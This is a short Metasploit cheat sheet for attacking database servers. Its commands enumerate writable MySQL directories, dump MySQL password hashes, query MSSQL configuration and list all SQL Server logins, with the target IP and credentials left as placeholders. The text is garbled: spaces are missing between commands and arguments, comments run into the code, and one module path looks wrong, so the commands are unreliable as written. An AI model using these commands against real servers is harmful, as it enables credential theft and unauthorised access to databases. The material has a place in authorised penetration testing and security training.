useauxiliary/scanner/mysql/mysql_writeable_dirs#Enumerate writeable directories using the MySQL SELECT INTO DUMPFILEsetdir_list/path/to/wordlists.txtsetrhosts $IPsetverbosefalsesetpassword $password #set password "" .....if empty password
hashdump
useauxiliary/scanner/mysql/mysql_hashdumpsetusername $usernamesetpassword $password # "" if no pass/empty passrun
useauxiliary/admin/mssql/mssql_enum#the mssql_enum is an admin module that will accept a set of #credentials and query a MSSQL for various configuration settings.#set all the required options
obtain all logins
useauxiliary/scanner/admin/mssql/mssql_enum_sql_logins#This module can be used to obtain a list of all logins from a SQL Server with any login. #Selecting all of the logins from the master..syslogins table is restricted to sysadmins#set required options